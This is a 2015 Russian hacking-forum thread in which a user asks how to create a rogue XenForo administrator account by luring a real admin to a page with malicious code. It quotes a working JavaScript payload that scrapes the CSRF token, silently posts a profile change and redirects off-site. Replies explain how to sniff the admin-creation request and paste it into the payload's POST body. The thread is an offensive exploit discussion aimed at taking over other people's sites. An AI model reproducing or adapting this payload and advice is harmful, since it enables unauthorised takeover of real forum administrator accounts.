Как это решить?

Discussion in 'Песочница' started by Lonely Man, 17 Jul 2015.

  1. Lonely Man

    Lonely Man New Member

    Joined:
    17 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Доброе время суток. В поисках ответа на свой порос я пришел к Вам, так-как тут говорят что есть знающие люди. Суть вопроса такова: как создать новую учетную запись администратора на XenForo через подмену куки реального администратора методом редиректов на страницу с вредоносным кодом?

    Вдохновился статьей одного из модераторов yarbabin где он показывал как обычным редиректом на страницу с вредоносным кодом можно было изменять подписи.

    HTML:
    $(document).ready(function pwn() { 
$(document.body).hide(); 
$('html').css('background-color','#fff'); 
var getcsrf = document.body.innerHTML;
var re = new RegExp('_csrfToken: "(.*)"', 'ig');
token = re.exec(getcsrf)[1];
var xhr = new XMLHttpRequest();
var body = 'about_html=%3Cp%3EPWNED+BY+%3Ca+href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22+class%3D%22internalLink+ProxyLink%22+data-proxy-href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22%3EYARBABIN%3C%2Fa%3E%3C%2Fp%3E%0D%0A&_xfRelativeResolver=https%3A%2F%2Fbhf.su%2Faccount%2Fpersonal-details&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%B8%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F&_xfRequestUri=%2Faccount%2Fpersonal-details&_xfNoRedirect=1&_xfToken=' + encodeURIComponent(token) + '&_xfResponseType=json';
xhr.open("POST", '/account/personal-details-save', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(body);
document.location.href='https://yarbabin.ru/dorkgen/dorkgen.php';
});
    Есть-ли люди знающие как реализовать данную затею?
     
    #1 Lonely Man, 17 Jul 2015
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    так отснифайте запрос который отправляется при создании нового админа и воткните его в переменную body
     
    _________________________
    #2 yarbabin, 17 Jul 2015
  3. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    143
    Likes Received:
    51
    Reputations:
    116
    Я бы написал не через подмену куки, а через выполнение javascript кода в контексте атакуемого домена.
     
    #3 ocheretko, 17 Jul 2015
  4. Lonely Man

    Lonely Man New Member

    Joined:
    17 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Если можете можно навести пример кода. В JavaScript пока что понимаю лишь азы не более.
     
    #4 Lonely Man, 17 Jul 2015
  5. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    143
    Likes Received:
    51
    Reputations:
    116
    Пример кода написан у Вас в первом сообщении, Вы просто меня не правильно поняли.
    Вам нужно перехватить сниффером запрос добавления новой учетной записи, и эти данные подставить в код из первого сообщения. Естественно для этого установите себе этот движок (XenForo) на локальный компьютер, или Ваш хостинг. Сниффер выбирайте какой Вам больше нравится. Я пользуюсь HTTPAnalyzer.

    var body = ' - параметры и значения POST запроса
    xhr.open("POST", ' - адрес скрипта на удаленном сервере, куда отсылать POST
     
    #5 ocheretko, 17 Jul 2015
(You must log in or sign up to post here.)